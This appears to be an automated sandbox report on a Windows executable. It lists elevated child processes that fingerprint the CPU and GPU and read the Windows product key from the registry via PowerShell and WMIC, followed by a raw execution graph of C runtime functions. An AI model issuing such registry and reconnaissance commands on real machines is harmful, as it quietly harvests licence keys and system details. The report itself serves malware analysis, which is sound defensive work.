                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:95
                                                                                                                                                                                                                                                                                                                      Start time:14:19:51
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:96
                                                                                                                                                                                                                                                                                                                      Start time:14:19:52
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:97
                                                                                                                                                                                                                                                                                                                      Start time:14:19:52
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:98
                                                                                                                                                                                                                                                                                                                      Start time:14:19:52
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6e2040000
                                                                                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:99
                                                                                                                                                                                                                                                                                                                      Start time:14:19:53
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:100
                                                                                                                                                                                                                                                                                                                      Start time:14:19:53
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:101
                                                                                                                                                                                                                                                                                                                      Start time:14:19:53
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                        Execution Coverage:8.7%
                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                        Signature Coverage:14.8%
                                                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:37
                                                                                                                                                                                                                                                                                                                        execution_graph 19095 7ff6ba3cadfe 19096 7ff6ba3cae0d 19095->19096 19098 7ff6ba3cae17 19095->19098 19099 7ff6ba3c0338 LeaveCriticalSection 19096->19099 19100 7ff6ba3b5410 19101 7ff6ba3b541b 19100->19101 19109 7ff6ba3bf2a4 19101->19109 19122 7ff6ba3c02d8 EnterCriticalSection 19109->19122 18867 7ff6ba3bf98c 18868 7ff6ba3bfb7e 18867->18868 18870 7ff6ba3bf9ce _isindst 18867->18870 18869 7ff6ba3b4f08 _get_daylight 11 API calls 18868->18869 18887 7ff6ba3bfb6e 18869->18887 18870->18868 18873 7ff6ba3bfa4e _isindst 18870->18873 18871 7ff6ba3ac550 _log10_special 8 API calls 18872 7ff6ba3bfb99 18871->18872 18888 7ff6ba3c6194 18873->18888 18878 7ff6ba3bfbaa 18880 7ff6ba3ba900 _isindst 17 API calls 18878->18880 18882 7ff6ba3bfbbe 18880->18882 18885 7ff6ba3bfaab 18885->18887 18912 7ff6ba3c61d8 18885->18912 18887->18871 18889 7ff6ba3c61a3 18888->18889 18891 7ff6ba3bfa6c 18888->18891 18919 7ff6ba3c02d8 EnterCriticalSection 18889->18919 18894 7ff6ba3c5598 18891->18894 18895 7ff6ba3c55a1 18894->18895 18899 7ff6ba3bfa81 18894->18899 18896 7ff6ba3b4f08 _get_daylight 11 API calls 18895->18896 18897 7ff6ba3c55a6 18896->18897 18898 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18897->18898 18898->18899 18899->18878 18900 7ff6ba3c55c8 18899->18900 18901 7ff6ba3c55d1 18900->18901 18902 7ff6ba3bfa92 18900->18902 18903 7ff6ba3b4f08 _get_daylight 11 API calls 18901->18903 18902->18878 18906 7ff6ba3c55f8 18902->18906 18904 7ff6ba3c55d6 18903->18904 18905 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18904->18905 18905->18902 18907 7ff6ba3c5601 18906->18907 18908 7ff6ba3bfaa3 18906->18908 18909 7ff6ba3b4f08 _get_daylight 11 API calls 18907->18909 18908->18878 18908->18885 18910 7ff6ba3c5606 18909->18910 18911 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18910->18911 18911->18908 18920 7ff6ba3c02d8 EnterCriticalSection 18912->18920 19140 7ff6ba3c7c20 19143 7ff6ba3c25f0 19140->19143 19144 7ff6ba3c25fd 19143->19144 19148 7ff6ba3c2642 19143->19148 19149 7ff6ba3bb224 19144->19149 19150 7ff6ba3bb250 FlsSetValue 19149->19150 19151 7ff6ba3bb235 FlsGetValue 19149->19151 19152 7ff6ba3bb242 19150->19152 19153 7ff6ba3bb25d 19150->19153 19151->19152 19154 7ff6ba3bb24a 19151->19154 19155 7ff6ba3bb248 19152->19155 19156 7ff6ba3ba504 _CreateFrameInfo 45 API calls 19152->19156 19157 7ff6ba3beb98 _get_daylight 11 API calls 19153->19157 19154->19150 19169 7ff6ba3c22c4 19155->19169 19158 7ff6ba3bb2c5 19156->19158 19159 7ff6ba3bb26c 19157->19159 19160 7ff6ba3bb28a FlsSetValue 19159->19160 19161 7ff6ba3bb27a FlsSetValue 19159->19161 19163 7ff6ba3bb2a8 19160->19163 19164 7ff6ba3bb296 FlsSetValue 19160->19164 19162 7ff6ba3bb283 19161->19162 19165 7ff6ba3ba948 __free_lconv_mon 11 API calls 19162->19165 19166 7ff6ba3baef4 _get_daylight 11 API calls 19163->19166 19164->19162 19165->19152 19167 7ff6ba3bb2b0 19166->19167 19168 7ff6ba3ba948 __free_lconv_mon 11 API calls 19167->19168 19168->19155 19192 7ff6ba3c2534 19169->19192 19171 7ff6ba3c22f9 19207 7ff6ba3c1fc4 19171->19207 19174 7ff6ba3bd5fc _fread_nolock 12 API calls 19175 7ff6ba3c2327 19174->19175 19176 7ff6ba3c232f 19175->19176 19178 7ff6ba3c233e 19175->19178 19177 7ff6ba3ba948 __free_lconv_mon 11 API calls 19176->19177 19189 7ff6ba3c2316 19177->19189 19178->19178 19214 7ff6ba3c266c 19178->19214 19181 7ff6ba3c243a 19182 7ff6ba3b4f08 _get_daylight 11 API calls 19181->19182 19183 7ff6ba3c243f 19182->19183 19185 7ff6ba3ba948 __free_lconv_mon 11 API calls 19183->19185 19184 7ff6ba3c2495 19191 7ff6ba3c24fc 19184->19191 19225 7ff6ba3c1df4 19184->19225 19185->19189 19186 7ff6ba3c2454 19186->19184 19190 7ff6ba3ba948 __free_lconv_mon 11 API calls 19186->19190 19188 7ff6ba3ba948 __free_lconv_mon 11 API calls 19188->19189 19189->19148 19190->19184 19191->19188 19193 7ff6ba3c2557 19192->19193 19194 7ff6ba3c2561 19193->19194 19240 7ff6ba3c02d8 EnterCriticalSection 19193->19240 19196 7ff6ba3c25d3 19194->19196 19198 7ff6ba3ba504 _CreateFrameInfo 45 API calls 19194->19198 19196->19171 19200 7ff6ba3c25eb 19198->19200 19202 7ff6ba3c2642 19200->19202 19204 7ff6ba3bb224 50 API calls 19200->19204 19202->19171 19205 7ff6ba3c262c 19204->19205 19206 7ff6ba3c22c4 65 API calls 19205->19206 19206->19202 19208 7ff6ba3b4f4c 45 API calls 19207->19208 19209 7ff6ba3c1fd8 19208->19209 19210 7ff6ba3c1fe4 GetOEMCP 19209->19210 19211 7ff6ba3c1ff6 19209->19211 19212 7ff6ba3c200b 19210->19212 19211->19212 19213 7ff6ba3c1ffb GetACP 19211->19213 19212->19174 19212->19189 19213->19212 19215 7ff6ba3c1fc4 47 API calls 19214->19215 19216 7ff6ba3c2699 19215->19216 19217 7ff6ba3c27ef 19216->19217 19219 7ff6ba3c26d6 IsValidCodePage 19216->19219 19224 7ff6ba3c26f0 __scrt_get_show_window_mode 19216->19224 19218 7ff6ba3ac550 _log10_special 8 API calls 19217->19218 19221 7ff6ba3c2431 19218->19221 19219->19217 19220 7ff6ba3c26e7 19219->19220 19222 7ff6ba3c2716 GetCPInfo 19220->19222 19220->19224 19221->19181 19221->19186 19222->19217 19222->19224 19241 7ff6ba3c20dc 19224->19241 19307 7ff6ba3c02d8 EnterCriticalSection 19225->19307 19242 7ff6ba3c2119 GetCPInfo 19241->19242 19243 7ff6ba3c220f 19241->19243 19242->19243 19249 7ff6ba3c212c 19242->19249 19244 7ff6ba3ac550 _log10_special 8 API calls 19243->19244 19246 7ff6ba3c22ae 19244->19246 19245 7ff6ba3c2e40 48 API calls 19247 7ff6ba3c21a3 19245->19247 19246->19217 19252 7ff6ba3c7b84 19247->19252 19249->19245 19251 7ff6ba3c7b84 54 API calls 19251->19243 19253 7ff6ba3b4f4c 45 API calls 19252->19253 19254 7ff6ba3c7ba9 19253->19254 19257 7ff6ba3c7850 19254->19257 19258 7ff6ba3c7891 19257->19258 19259 7ff6ba3bf8a0 _fread_nolock MultiByteToWideChar 19258->19259 19260 7ff6ba3c78db 19259->19260 19263 7ff6ba3c7b59 19260->19263 19264 7ff6ba3bd5fc _fread_nolock 12 API calls 19260->19264 19265 7ff6ba3c7a11 19260->19265 19267 7ff6ba3c7913 19260->19267 19261 7ff6ba3ac550 _log10_special 8 API calls 19262 7ff6ba3c21d6 19261->19262 19262->19251 19263->19261 19264->19267 19265->19263 19266 7ff6ba3ba948 __free_lconv_mon 11 API calls 19265->19266 19266->19263 19267->19265 19268 7ff6ba3bf8a0 _fread_nolock MultiByteToWideChar 19267->19268 19269 7ff6ba3c7986 19268->19269 19269->19265 19288 7ff6ba3bf0e4 19269->19288 19272 7ff6ba3c79d1 19272->19265 19275 7ff6ba3bf0e4 __crtLCMapStringW 6 API calls 19272->19275 19273 7ff6ba3c7a22 19274 7ff6ba3bd5fc _fread_nolock 12 API calls 19273->19274 19276 7ff6ba3c7af4 19273->19276 19278 7ff6ba3c7a40 19273->19278 19274->19278 19275->19265 19276->19265 19277 7ff6ba3ba948 __free_lconv_mon 11 API calls 19276->19277 19277->19265 19278->19265 19279 7ff6ba3bf0e4 __crtLCMapStringW 6 API calls 19278->19279 19280 7ff6ba3c7ac0 19279->19280 19280->19276 19281 7ff6ba3c7ae0 19280->19281 19282 7ff6ba3c7af6 19280->19282 19283 7ff6ba3c07e8 WideCharToMultiByte 19281->19283 19284 7ff6ba3c07e8 WideCharToMultiByte 19282->19284 19285 7ff6ba3c7aee 19283->19285 19284->19285 19285->19276 19286 7ff6ba3c7b0e 19285->19286 19286->19265 19287 7ff6ba3ba948 __free_lconv_mon 11 API calls 19286->19287 19287->19265 19294 7ff6ba3bed10 19288->19294 19291 7ff6ba3bf12a 19291->19265 19291->19272 19291->19273 19293 7ff6ba3bf193 LCMapStringW 19293->19291 19295 7ff6ba3bed6d 19294->19295 19296 7ff6ba3bed68 __vcrt_FlsAlloc 19294->19296 19295->19291 19304 7ff6ba3bf1d0 19295->19304 19296->19295 19297 7ff6ba3bed9d LoadLibraryExW 19296->19297 19298 7ff6ba3bee92 GetProcAddress 19296->19298 19303 7ff6ba3bedfc LoadLibraryExW 19296->19303 19299 7ff6ba3bee72 19297->19299 19300 7ff6ba3bedc2 GetLastError 19297->19300 19298->19295 19301 7ff6ba3beea3 19298->19301 19299->19298 19302 7ff6ba3bee89 FreeLibrary 19299->19302 19300->19296 19301->19295 19302->19298 19303->19296 19303->19299 19305 7ff6ba3bed10 __crtLCMapStringW 5 API calls 19304->19305 19306 7ff6ba3bf1fe __crtLCMapStringW 19305->19306 19306->19293 19962 7ff6ba3bc520 19973 7ff6ba3c02d8 EnterCriticalSection 19962->19973 19769 7ff6ba3c16b0 19780 7ff6ba3c73e4 19769->19780 19781 7ff6ba3c73f1 19780->19781 19782 7ff6ba3ba948 __free_lconv_mon 11 API calls 19781->19782 19783 7ff6ba3c740d 19781->19783 19782->19781 19784 7ff6ba3ba948 __free_lconv_mon 11 API calls 19783->19784 19785 7ff6ba3c16b9 19783->19785 19784->19783 19786 7ff6ba3c02d8 EnterCriticalSection 19785->19786 16124 7ff6ba3b5628 16125 7ff6ba3b565f 16124->16125 16126 7ff6ba3b5642 16124->16126 16125->16126 16127 7ff6ba3b5672 CreateFileW 16125->16127 16149 7ff6ba3b4ee8 16126->16149 16129 7ff6ba3b56a6 16127->16129 16130 7ff6ba3b56dc 16127->16130 16152 7ff6ba3b577c GetFileType 16129->16152 16178 7ff6ba3b5c04 16130->16178 16134 7ff6ba3b4f08 _get_daylight 11 API calls 16137 7ff6ba3b564f 16134->16137 16138 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16137->16138 16145 7ff6ba3b565a 16138->16145 16139 7ff6ba3b56d1 CloseHandle 16139->16145 16140 7ff6ba3b56bb CloseHandle 16140->16145 16141 7ff6ba3b5710 16204 7ff6ba3b59c4 16141->16204 16142 7ff6ba3b56e5 16199 7ff6ba3b4e7c 16142->16199 16148 7ff6ba3b56ef 16148->16145 16150 7ff6ba3bb2c8 _get_daylight 11 API calls 16149->16150 16151 7ff6ba3b4ef1 16150->16151 16151->16134 16153 7ff6ba3b5887 16152->16153 16154 7ff6ba3b57ca 16152->16154 16155 7ff6ba3b58b1 16153->16155 16156 7ff6ba3b588f 16153->16156 16157 7ff6ba3b57f6 GetFileInformationByHandle 16154->16157 16162 7ff6ba3b5b00 21 API calls 16154->16162 16161 7ff6ba3b58d4 PeekNamedPipe 16155->16161 16177 7ff6ba3b5872 16155->16177 16158 7ff6ba3b58a2 GetLastError 16156->16158 16159 7ff6ba3b5893 16156->16159 16157->16158 16160 7ff6ba3b581f 16157->16160 16166 7ff6ba3b4e7c _fread_nolock 11 API calls 16158->16166 16164 7ff6ba3b4f08 _get_daylight 11 API calls 16159->16164 16165 7ff6ba3b59c4 51 API calls 16160->16165 16161->16177 16163 7ff6ba3b57e4 16162->16163 16163->16157 16163->16177 16164->16177 16167 7ff6ba3b582a 16165->16167 16166->16177 16221 7ff6ba3b5924 16167->16221 16168 7ff6ba3ac550 _log10_special 8 API calls 16169 7ff6ba3b56b4 16168->16169 16169->16139 16169->16140 16172 7ff6ba3b5924 10 API calls 16173 7ff6ba3b5849 16172->16173 16174 7ff6ba3b5924 10 API calls 16173->16174 16175 7ff6ba3b585a 16174->16175 16176 7ff6ba3b4f08 _get_daylight 11 API calls 16175->16176 16175->16177 16176->16177 16177->16168 16179 7ff6ba3b5c3a 16178->16179 16180 7ff6ba3b5cd2 __std_exception_copy 16179->16180 16181 7ff6ba3b4f08 _get_daylight 11 API calls 16179->16181 16182 7ff6ba3ac550 _log10_special 8 API calls 16180->16182 16183 7ff6ba3b5c4c 16181->16183 16184 7ff6ba3b56e1 16182->16184 16185 7ff6ba3b4f08 _get_daylight 11 API calls 16183->16185 16184->16141 16184->16142 16186 7ff6ba3b5c54 16185->16186 16228 7ff6ba3b7e08 16186->16228 16188 7ff6ba3b5c69 16189 7ff6ba3b5c71 16188->16189 16190 7ff6ba3b5c7b 16188->16190 16191 7ff6ba3b4f08 _get_daylight 11 API calls 16189->16191 16192 7ff6ba3b4f08 _get_daylight 11 API calls 16190->16192 16198 7ff6ba3b5c76 16191->16198 16193 7ff6ba3b5c80 16192->16193 16193->16180 16194 7ff6ba3b4f08 _get_daylight 11 API calls 16193->16194 16195 7ff6ba3b5c8a 16194->16195 16197 7ff6ba3b7e08 45 API calls 16195->16197 16196 7ff6ba3b5cc4 GetDriveTypeW 16196->16180 16197->16198 16198->16180 16198->16196 16200 7ff6ba3bb2c8 _get_daylight 11 API calls 16199->16200 16201 7ff6ba3b4e89 __free_lconv_mon 16200->16201 16202 7ff6ba3bb2c8 _get_daylight 11 API calls 16201->16202 16203 7ff6ba3b4eab 16202->16203 16203->16148 16206 7ff6ba3b59ec 16204->16206 16205 7ff6ba3b571d 16214 7ff6ba3b5b00 16205->16214 16206->16205 16322 7ff6ba3bf724 16206->16322 16208 7ff6ba3b5a80 16208->16205 16209 7ff6ba3bf724 51 API calls 16208->16209 16210 7ff6ba3b5a93 16209->16210 16210->16205 16211 7ff6ba3bf724 51 API calls 16210->16211 16212 7ff6ba3b5aa6 16211->16212 16212->16205 16213 7ff6ba3bf724 51 API calls 16212->16213 16213->16205 16215 7ff6ba3b5b1a 16214->16215 16216 7ff6ba3b5b51 16215->16216 16217 7ff6ba3b5b2a 16215->16217 16218 7ff6ba3bf5b8 21 API calls 16216->16218 16219 7ff6ba3b4e7c _fread_nolock 11 API calls 16217->16219 16220 7ff6ba3b5b3a 16217->16220 16218->16220 16219->16220 16220->16148 16222 7ff6ba3b5940 16221->16222 16223 7ff6ba3b594d FileTimeToSystemTime 16221->16223 16222->16223 16225 7ff6ba3b5948 16222->16225 16224 7ff6ba3b5961 SystemTimeToTzSpecificLocalTime 16223->16224 16223->16225 16224->16225 16226 7ff6ba3ac550 _log10_special 8 API calls 16225->16226 16227 7ff6ba3b5839 16226->16227 16227->16172 16229 7ff6ba3b7e24 16228->16229 16230 7ff6ba3b7e92 16228->16230 16229->16230 16232 7ff6ba3b7e29 16229->16232 16265 7ff6ba3c07c0 16230->16265 16233 7ff6ba3b7e41 16232->16233 16234 7ff6ba3b7e5e 16232->16234 16240 7ff6ba3b7bd8 GetFullPathNameW 16233->16240 16248 7ff6ba3b7c4c GetFullPathNameW 16234->16248 16239 7ff6ba3b7e56 __std_exception_copy 16239->16188 16241 7ff6ba3b7bfe GetLastError 16240->16241 16242 7ff6ba3b7c14 16240->16242 16243 7ff6ba3b4e7c _fread_nolock 11 API calls 16241->16243 16245 7ff6ba3b4f08 _get_daylight 11 API calls 16242->16245 16247 7ff6ba3b7c10 16242->16247 16244 7ff6ba3b7c0b 16243->16244 16246 7ff6ba3b4f08 _get_daylight 11 API calls 16244->16246 16245->16247 16246->16247 16247->16239 16249 7ff6ba3b7c7f GetLastError 16248->16249 16252 7ff6ba3b7c95 __std_exception_copy 16248->16252 16250 7ff6ba3b4e7c _fread_nolock 11 API calls 16249->16250 16251 7ff6ba3b7c8c 16250->16251 16253 7ff6ba3b4f08 _get_daylight 11 API calls 16251->16253 16254 7ff6ba3b7c91 16252->16254 16255 7ff6ba3b7cef GetFullPathNameW 16252->16255 16253->16254 16256 7ff6ba3b7d24 16254->16256 16255->16249 16255->16254 16257 7ff6ba3b7d98 memcpy_s 16256->16257 16258 7ff6ba3b7d4d __scrt_get_show_window_mode 16256->16258 16257->16239 16258->16257 16259 7ff6ba3b7d81 16258->16259 16262 7ff6ba3b7dba 16258->16262 16260 7ff6ba3b4f08 _get_daylight 11 API calls 16259->16260 16261 7ff6ba3b7d86 16260->16261 16263 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16261->16263 16262->16257 16264 7ff6ba3b4f08 _get_daylight 11 API calls 16262->16264 16263->16257 16264->16261 16268 7ff6ba3c05d0 16265->16268 16269 7ff6ba3c0612 16268->16269 16270 7ff6ba3c05fb 16268->16270 16272 7ff6ba3c0637 16269->16272 16273 7ff6ba3c0616 16269->16273 16271 7ff6ba3b4f08 _get_daylight 11 API calls 16270->16271 16275 7ff6ba3c0600 16271->16275 16306 7ff6ba3bf5b8 16272->16306 16294 7ff6ba3c073c 16273->16294 16279 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16275->16279 16277 7ff6ba3c063c 16282 7ff6ba3c06e1 16277->16282 16289 7ff6ba3c0663 16277->16289 16293 7ff6ba3c060b __std_exception_copy 16279->16293 16280 7ff6ba3c061f 16281 7ff6ba3b4ee8 _fread_nolock 11 API calls 16280->16281 16283 7ff6ba3c0624 16281->16283 16282->16270 16284 7ff6ba3c06e9 16282->16284 16286 7ff6ba3b4f08 _get_daylight 11 API calls 16283->16286 16287 7ff6ba3b7bd8 13 API calls 16284->16287 16285 7ff6ba3ac550 _log10_special 8 API calls 16288 7ff6ba3c0731 16285->16288 16286->16275 16287->16293 16288->16239 16290 7ff6ba3b7c4c 14 API calls 16289->16290 16291 7ff6ba3c06a7 16290->16291 16292 7ff6ba3b7d24 37 API calls 16291->16292 16291->16293 16292->16293 16293->16285 16295 7ff6ba3c0786 16294->16295 16296 7ff6ba3c0756 16294->16296 16297 7ff6ba3c0791 GetDriveTypeW 16295->16297 16298 7ff6ba3c0771 16295->16298 16299 7ff6ba3b4ee8 _fread_nolock 11 API calls 16296->16299 16297->16298 16301 7ff6ba3ac550 _log10_special 8 API calls 16298->16301 16300 7ff6ba3c075b 16299->16300 16302 7ff6ba3b4f08 _get_daylight 11 API calls 16300->16302 16303 7ff6ba3c061b 16301->16303 16304 7ff6ba3c0766 16302->16304 16303->16277 16303->16280 16305 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16304->16305 16305->16298 16320 7ff6ba3ca4d0 16306->16320 16309 7ff6ba3bf605 16312 7ff6ba3ac550 _log10_special 8 API calls 16309->16312 16310 7ff6ba3bf62c 16311 7ff6ba3beb98 _get_daylight 11 API calls 16310->16311 16313 7ff6ba3bf63b 16311->16313 16314 7ff6ba3bf699 16312->16314 16315 7ff6ba3bf645 GetCurrentDirectoryW 16313->16315 16316 7ff6ba3bf654 16313->16316 16314->16277 16315->16316 16317 7ff6ba3bf659 16315->16317 16318 7ff6ba3b4f08 _get_daylight 11 API calls 16316->16318 16319 7ff6ba3ba948 __free_lconv_mon 11 API calls 16317->16319 16318->16317 16319->16309 16321 7ff6ba3bf5ee GetCurrentDirectoryW 16320->16321 16321->16309 16321->16310 16323 7ff6ba3bf731 16322->16323 16324 7ff6ba3bf755 16322->16324 16323->16324 16325 7ff6ba3bf736 16323->16325 16326 7ff6ba3bf78f 16324->16326 16329 7ff6ba3bf7ae 16324->16329 16327 7ff6ba3b4f08 _get_daylight 11 API calls 16325->16327 16328 7ff6ba3b4f08 _get_daylight 11 API calls 16326->16328 16330 7ff6ba3bf73b 16327->16330 16332 7ff6ba3bf794 16328->16332 16339 7ff6ba3b4f4c 16329->16339 16331 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16330->16331 16334 7ff6ba3bf746 16331->16334 16335 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 16332->16335 16334->16208 16336 7ff6ba3bf79f 16335->16336 16336->16208 16337 7ff6ba3c04dc 51 API calls 16338 7ff6ba3bf7bb 16337->16338 16338->16336 16338->16337 16340 7ff6ba3b4f70 16339->16340 16346 7ff6ba3b4f6b 16339->16346 16341 7ff6ba3bb150 _CreateFrameInfo 45 API calls 16340->16341 16340->16346 16342 7ff6ba3b4f8b 16341->16342 16347 7ff6ba3bd984 16342->16347 16346->16338 16348 7ff6ba3b4fae 16347->16348 16349 7ff6ba3bd999 16347->16349 16351 7ff6ba3bd9f0 16348->16351 16349->16348 16355 7ff6ba3c3304 16349->16355 16352 7ff6ba3bda05 16351->16352 16353 7ff6ba3bda18 16351->16353 16352->16353 16368 7ff6ba3c2650 16352->16368 16353->16346 16356 7ff6ba3bb150 _CreateFrameInfo 45 API calls 16355->16356 16357 7ff6ba3c3313 16356->16357 16358 7ff6ba3c335e 16357->16358 16367 7ff6ba3c02d8 EnterCriticalSection 16357->16367 16358->16348 16369 7ff6ba3bb150 _CreateFrameInfo 45 API calls 16368->16369 16370 7ff6ba3c2659 16369->16370 16371 7ff6ba3acc3c 16392 7ff6ba3ace0c 16371->16392 16374 7ff6ba3acd88 16546 7ff6ba3ad12c IsProcessorFeaturePresent 16374->16546 16375 7ff6ba3acc58 __scrt_acquire_startup_lock 16377 7ff6ba3acd92 16375->16377 16382 7ff6ba3acc76 __scrt_release_startup_lock 16375->16382 16378 7ff6ba3ad12c 7 API calls 16377->16378 16380 7ff6ba3acd9d _CreateFrameInfo 16378->16380 16379 7ff6ba3acc9b 16381 7ff6ba3acd21 16398 7ff6ba3ad274 16381->16398 16382->16379 16382->16381 16535 7ff6ba3b9b2c 16382->16535 16384 7ff6ba3acd26 16401 7ff6ba3a1000 16384->16401 16389 7ff6ba3acd49 16389->16380 16542 7ff6ba3acf90 16389->16542 16393 7ff6ba3ace14 16392->16393 16394 7ff6ba3ace20 __scrt_dllmain_crt_thread_attach 16393->16394 16395 7ff6ba3acc50 16394->16395 16396 7ff6ba3ace2d 16394->16396 16395->16374 16395->16375 16396->16395 16553 7ff6ba3ad888 16396->16553 16399 7ff6ba3ca4d0 __scrt_get_show_window_mode 16398->16399 16400 7ff6ba3ad28b GetStartupInfoW 16399->16400 16400->16384 16402 7ff6ba3a1009 16401->16402 16580 7ff6ba3b5484 16402->16580 16404 7ff6ba3a37fb 16587 7ff6ba3a36b0 16404->16587 16407 7ff6ba3a3808 __std_exception_copy 16409 7ff6ba3ac550 _log10_special 8 API calls 16407->16409 16411 7ff6ba3a3ca7 16409->16411 16540 7ff6ba3ad2b8 